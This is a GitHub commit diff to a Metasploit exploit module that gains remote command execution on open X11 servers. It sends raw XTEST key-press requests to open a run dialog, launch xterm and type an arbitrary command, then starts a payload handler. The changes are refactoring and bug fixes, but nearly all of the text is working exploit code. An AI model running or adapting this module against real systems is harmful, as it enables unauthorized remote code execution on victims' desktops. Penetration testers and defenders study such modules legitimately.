Skip to content

Commit d6a9fc2

Browse files
author
xistence
committed
Merge branch 'hmoore-r7-land-5692' into x11_keyboard_exec
2 parents a81a9e0 + 95b9208 commit d6a9fc2

File tree

1 file changed

+18
-17
lines changed

1 file changed

+18
-17
lines changed

modules/exploits/unix/x11/x11_keyboard_exec.rb

Lines changed: 18 additions & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -109,11 +109,11 @@ def initialize(info = {})
109109
register_options(
110110
[
111111
Opt::RPORT(6000),
112-
OptInt.new('TIME_WAIT', [ true, 'Time to wait for opening GUI windows', 5])
112+
OptInt.new('TIME_WAIT', [ true, 'Time to wait for opening GUI windows in seconds', 5])
113113
], self.class)
114114
end
115115

116-
def press_key( key )
116+
def press_key(key)
117117
req = "\x8e\x02\x09\x00"
118118
req << "\x02"
119119
req << key
@@ -129,15 +129,15 @@ def press_key( key )
129129

130130
sock.put(req)
131131

132-
res = sock.recv(1024)
132+
res = sock.get_once
133133
# Response should give 1 on first byte (Success)
134-
unless res and res[0] == "\x01"
135-
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error pressing key: #{key}")
134+
unless res and res[0,1] == "\x01"
135+
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error pressing key: #{key} #{res.inspect}")
136136
end
137137

138138
end
139139

140-
def release_key( key )
140+
def release_key(key)
141141
req = "\x8e\x02\x09\x00"
142142
req << "\x03"
143143
req << key
@@ -153,18 +153,18 @@ def release_key( key )
153153

154154
sock.put(req)
155155

156-
res = sock.recv(1024)
156+
res = sock.get_once
157157
# Response should give 1 on first byte (Success)
158-
unless res and res[0] == "\x01"
159-
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error releasing key: #{key}")
158+
unless res and res[0,1] == "\x01"
159+
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error releasing key: #{key} #{res.inspect}")
160160
end
161161

162162
end
163163

164-
def type_command( command )
164+
def type_command(command)
165165
# Specify the special keys which need to have shift pressed first to type
166-
specialkeys = '<>{}|"&()'.chars.to_a
167-
values = command.chars.to_a
166+
specialkeys = '<>{}|"&()'.chars
167+
values = command.chars
168168
values.each do |value|
169169
key = KB_KEYS[value]
170170
# Special keys need a shift pressed to be typed
@@ -186,8 +186,8 @@ def type_command( command )
186186
end
187187
end
188188
# Send an enter
189-
press_key( "\x24" ) # [enter]
190-
release_key( "\x24" ) # [enter]
189+
press_key("\x24") # [enter]
190+
release_key("\x24") # [enter]
191191
end
192192

193193

@@ -212,10 +212,10 @@ def exploit
212212
sock.put(req)
213213

214214
# Retrieve the whole X11 details response
215-
res = sock.recv(4096)
215+
res = sock.get_once
216216

217217
# Response should give 0x01 in first byte (Success)
218-
unless res and res[0] == "\x01"
218+
unless res and res[0,1] == "\x01"
219219
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Registering keyboard failed")
220220
end
221221

@@ -227,12 +227,14 @@ def exploit
227227
release_key(KB_KEYS["f2"])
228228

229229
# Wait X seconds to open the dialog
230+
print_status("Waiting #{datastore['TIME_WAIT']} seconds...")
230231
select(nil, nil, nil, datastore['TIME_WAIT'])
231232

232233
# Start a xterm terminal
233234
print_status("#{rhost}:#{rport} - Opening xterm")
234235
type_command("xterm")
235236

237+
print_status("Waiting #{datastore['TIME_WAIT']} seconds...")
236238
# Wait X seconds to open the terminal
237239
select(nil, nil, nil, datastore['TIME_WAIT'])
238240

@@ -242,7 +244,6 @@ def exploit
242244

243245
type_command(command)
244246

245-
246247
handler
247248
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
248249
print_error("#{rhost}:#{rport} - #{e.message}")

0 commit comments

Comments
 (0)